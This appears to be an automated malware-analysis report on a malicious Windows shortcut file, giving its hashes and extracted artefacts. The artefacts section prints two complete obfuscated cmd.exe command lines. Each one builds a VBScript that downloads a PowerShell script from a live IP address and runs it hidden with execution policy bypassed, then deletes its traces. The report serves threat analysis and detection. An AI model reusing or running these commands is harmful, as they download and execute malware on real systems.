Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
258aa2891f92620aa8540ab6ba13c9f4
Sha1
2167099d63bf1d92b02241312f467a5acbf4f181
Sha256
a1dbae0dd3e1d72f649be1c8a999274a22127ed27165018af1d96b7d6eda9baa
Sha384
0cc2832d5b2c014cdfe468d809b2e21ee2b4c469cc10e05811bbe55465d616e4b4e7c2643c164894b44215cfa334cd28
Sha512
5e4ab4a29737fbe010b3bf6bf46d57ba90293f7e51df64a599b9162363ba56c4f95c5b320c71ae5a1c46b4051bd5b4f28988c8ac7a80bbdfe42c1a8a48829857
SSDeep
48:V7PtJeQqTellc51WUrfAx7PUuuGJIEuqTelA51WUSxB1Bg/E7o/j27H:V7lJe7ellcn7i7suuGJIYelAnCT7J7H
TLSH
0E42AF8036E86304F2B2BE3DDE3A5B404537BAD0EE35839C8A10DC1D1966611CD74F36
File Structure
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/angeldogsled.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\i8d1u.ps1",2 > %TEMP%\xw.vbs && cscript //b %TEMP%\xw.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\i8d1u.ps1 && del %TEMP%\xw.vbs %TEMP%\i8d1u.ps1"

URLs in VB Code - #1

http://193.169.194.86/krr4g/angeldogsled.ps1

Deobfuscated PowerShell

Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1 IconLocation: imageres.dll"

Deobfuscated PowerShell

Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1"

LNK: Command Execution

cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2 > %TEMP%\vVy.vbs && cscript //b %TEMP%\vVy.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1 && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1"

URLs in VB Code - #1

http://193.169.194.86/krr4g/philanthropyephyra.ps1

Deobfuscated PowerShell

Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1 IconLocation: imageres.dll"

Deobfuscated PowerShell

Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1"

258aa2891f92620aa8540ab6ba13c9f4 (13.09 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙